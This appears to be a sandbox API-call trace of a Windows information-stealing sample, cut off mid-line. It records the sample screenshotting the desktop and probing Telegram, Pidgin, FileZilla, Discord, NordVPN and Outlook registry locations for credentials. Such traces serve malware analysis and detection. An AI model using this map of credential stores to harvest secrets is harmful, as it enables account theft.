[0235.401] CreateCompatibleDC (hdc=0x1401007f) returned 0x100101b1 [0235.412] CreateCompatibleBitmap (hdc=0x1401007f, cx=1440, cy=900) returned 0x90501a2 [0235.433] SelectObject (hdc=0x100101b1, h=0x90501a2) returned 0x185000f [0235.452] BitBlt (hdc=0x100101b1, x=0, y=0, cx=1440, cy=900, hdcSrc=0x1401007f, x1=0, y1=0, rop=0xcc0020) returned 1 [0235.462] SelectObject (hdc=0x100101b1, h=0x185000f) returned 0x90501a2 [0235.473] DeleteDC (hdc=0x100101b1) returned 1 [0235.474] ReleaseDC (hWnd=0x10010, hDC=0x1401007f) returned 1 [0235.486] GdiplusStartup (in: token=0x3f8db8, input=0x615d048, output=0x615d098 | out: token=0x3f8db8, output=0x615d098) returned 0x0 [0235.601] GdipCreateBitmapFromHBITMAP (hbm=0x90501a2, hpal=0x0, bitmap=0x615db44) returned 0x0 [0235.644] DeleteObject (ho=0x90501a2) returned 1 [0235.682] GdipGetImageDecodersSize (numDecoders=0x615db70, size=0x615db6c) returned 0x0 [0235.682] GdipGetImageDecoders (in: numDecoders=0x8, size=0x6a0, decoders=0x80f7f8 | out: decoders=0x80f7f8) returned 0x0 [0235.687] LocalFree (hMem=0x80f7f8) returned 0x0 [0235.732] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x800968 [0235.747] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x7ffb68 [0235.762] GdipSaveImageToStream (image=0x6342230, stream=0x59f0030, clsidEncoder=0x615db80*(Data1=0x557cf401, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x7ffb68) returned 0x0 [0236.002] LocalFree (hMem=0x7ffb68) returned 0x0 [0236.005] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", nBufferLength=0x105, lpBuffer=0x615d5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", lpFilePart=0x0) returned 0x3a [0236.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615dab8) returned 1 [0236.005] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\screenshot.jpeg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x548 [0236.007] GetFileType (hFile=0x548) returned 0x1 [0236.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615dab4) returned 1 [0236.007] GetFileType (hFile=0x548) returned 0x1 [0236.007] WriteFile (in: hFile=0x548, lpBuffer=0x281fd54*, nNumberOfBytesToWrite=0xc8c3, lpNumberOfBytesWritten=0x615db74, lpOverlapped=0x0 | out: lpBuffer=0x281fd54*, lpNumberOfBytesWritten=0x615db74*=0xc8c3, lpOverlapped=0x0) returned 1 [0236.009] CloseHandle (hObject=0x548) returned 1 [0236.070] CoTaskMemAlloc (cb=0x20c) returned 0x809060 [0236.070] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x809060 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0236.072] CoTaskMemFree (pv=0x809060) [0236.072] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x615d62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpFilePart=0x0) returned 0x21 [0236.078] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Telegram Desktop\\tdata", nBufferLength=0x105, lpBuffer=0x615d6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Telegram Desktop\\tdata", lpFilePart=0x0) returned 0x38 [0236.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615db10) returned 1 [0236.078] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Telegram Desktop\\tdata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\telegram desktop\\tdata"), fInfoLevelId=0x0, lpFileInformation=0x615db8c | out: lpFileInformation=0x615db8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615db0c) returned 1 [0236.152] CoTaskMemAlloc (cb=0x20c) returned 0x809060 [0236.152] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x809060 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0236.152] CoTaskMemFree (pv=0x809060) [0236.152] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x615bcb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpFilePart=0x0) returned 0x21 [0236.152] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\.purple\\accounts.xml", nBufferLength=0x105, lpBuffer=0x615bd4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\.purple\\accounts.xml", lpFilePart=0x0) returned 0x36 [0236.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c1ac) returned 1 [0236.152] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\.purple\\accounts.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\.purple\\accounts.xml"), fInfoLevelId=0x0, lpFileInformation=0x615c228 | out: lpFileInformation=0x615c228*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c1a8) returned 1 [0236.188] CoTaskMemAlloc (cb=0x20c) returned 0x809060 [0236.188] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x809060 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0236.188] CoTaskMemFree (pv=0x809060) [0236.188] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x615a030, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpFilePart=0x0) returned 0x21 [0236.189] CoTaskMemAlloc (cb=0x20c) returned 0x4b8ac70 [0236.189] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x4b8ac70 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0236.189] CoTaskMemFree (pv=0x4b8ac70) [0236.189] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x615a030, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpFilePart=0x0) returned 0x21 [0236.274] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\recentservers.xml", nBufferLength=0x105, lpBuffer=0x615bc9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\recentservers.xml", lpFilePart=0x0) returned 0x3d [0236.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c0fc) returned 1 [0236.275] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\recentservers.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\filezilla\\recentservers.xml"), fInfoLevelId=0x0, lpFileInformation=0x615c178 | out: lpFileInformation=0x615c178*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c0f8) returned 1 [0236.276] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\sitemanager.xml", nBufferLength=0x105, lpBuffer=0x615bc9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\sitemanager.xml", lpFilePart=0x0) returned 0x3b [0236.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c0fc) returned 1 [0236.276] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\sitemanager.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\filezilla\\sitemanager.xml"), fInfoLevelId=0x0, lpFileInformation=0x615c178 | out: lpFileInformation=0x615c178*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c0f8) returned 1 [0236.285] CoTaskMemAlloc (cb=0x20c) returned 0x4b8ac70 [0236.286] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x4b8ac70 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0236.286] CoTaskMemFree (pv=0x4b8ac70) [0236.286] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x615a5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpFilePart=0x0) returned 0x21 [0236.320] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\discord\\Local Storage\\leveldb\\", nBufferLength=0x105, lpBuffer=0x615bd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\discord\\Local Storage\\leveldb\\", lpFilePart=0x0) returned 0x40 [0236.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c188) returned 1 [0236.320] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\discord\\Local Storage\\leveldb\\" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\discord\\local storage\\leveldb"), fInfoLevelId=0x0, lpFileInformation=0x615c204 | out: lpFileInformation=0x615c204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c184) returned 1 [0236.435] CoTaskMemAlloc (cb=0x20c) returned 0x809250 [0236.435] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x809250 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0236.436] CoTaskMemFree (pv=0x809250) [0236.436] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x615bc74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpFilePart=0x0) returned 0x21 [0236.436] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\NordVPN", nBufferLength=0x105, lpBuffer=0x615bd08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\NordVPN", lpFilePart=0x0) returned 0x29 [0236.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c1a0) returned 1 [0236.439] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\NordVPN" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\nordvpn"), fInfoLevelId=0x0, lpFileInformation=0x2834b2c | out: lpFileInformation=0x2834b2c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c19c) returned 1 [0236.542] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x0) returned 0x2 [0236.542] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x615c144, lpdwDisposition=0x615c1cc | out: phkResult=0x615c144*=0x544, lpdwDisposition=0x615c1cc*=0x1) returned 0x0 [0236.543] RegQueryValueExW (in: hKey=0x544, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.543] RegCloseKey (hKey=0x544) returned 0x0 [0236.544] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.544] RegQueryValueExW (in: hKey=0x544, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.544] RegCloseKey (hKey=0x544) returned 0x0 [0236.544] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.545] RegQueryValueExW (in: hKey=0x544, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.545] RegCloseKey (hKey=0x544) returned 0x0 [0236.545] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.545] RegQueryValueExW (in: hKey=0x544, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.545] RegCloseKey (hKey=0x544) returned 0x0 [0236.546] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.546] RegQueryValueExW (in: hKey=0x544, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.546] RegCloseKey (hKey=0x544) returned 0x0 [0236.546] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.546] RegQueryValueExW (in: hKey=0x544, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.546] RegCloseKey (hKey=0x544) returned 0x0 [0236.547] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.547] RegQueryValueExW (in: hKey=0x544, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.547] RegCloseKey (hKey=0x544) returned 0x0 [0236.548] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.548] RegQueryValueExW (in: hKey=0x544, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.548] RegCloseKey (hKey=0x544) returned 0x0 [0236.548] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.548] RegQueryValueExW (in: hKey=0x544, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.548] RegCloseKey (hKey=0x544) returned 0x0 [0236.549] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.549] RegQueryValueExW (in: hKey=0x544, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.549] RegCloseKey (hKey=0x544) returned 0x0 [0236.550] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.550] RegQueryValueExW (in: hKey=0x544, lpValueName="Email", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.550] RegCloseKey (hKey=0x544) returned 0x0 [0236.550] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.550] RegQueryValueExW (in: hKey=0x544, lpValueName="HTTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.550] RegCloseKey (hKey=0x544) returned 0x0 [0236.551] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.551] RegQueryValueExW (in: hKey=0x544, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.551] RegCloseKey (hKey=0x544) returned 0x0 [0236.551] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.552] RegQueryValueExW (in: hKey=0x544, lpValueName="POP3 User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.552] RegCloseKey (hKey=0x544) returned 0x0 [0236.552] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.552] RegQueryValueExW (in: hKey=0x544, lpValueName="IMAP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.552] RegCloseKey (hKey=0x544) returned 0x0 [0236.553] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.553] RegQueryValueExW (in: hKey=0x544, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.553] RegCloseKey (hKey=0x544) returned 0x0 [0236.553] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.553] RegQueryValueExW (in: hKey=0x544, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.553] RegCloseKey (hKey=0x544) returned 0x0 [0236.553] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.554] RegQueryValueExW (in: hKey=0x544, lpValueName="SMTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.554] RegCloseKey (hKey=0x544) returned 0x0 [0236.554] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.554] RegQueryValueExW (in: hKey=0x544, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.554] RegCloseKey (hKey=0x544) returned 0x0 [0236.554] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.554] RegQueryValueExW (in: hKey=0x544, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.554] RegCloseKey (hKey=0x544) returned 0x0 [0236.554] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.554] RegQueryValueExW (in: hKey=0x544, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.554] RegCloseKey (hKey=0x544) returned 0x0 [0236.554] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.554] RegQueryValueExW (in: hKey=0x544, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.555] RegCloseKey (hKey=0x544) returned 0x0 [0236.555] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.555] RegQueryValueExW (in: hKey=0x544, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.555] RegCloseKey (hKey=0x544) returned 0x0 [0236.555] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.555] RegQueryValueExW (in: hKey=0x544, lpValueName="POP3 Password", lpReserved=0x0, 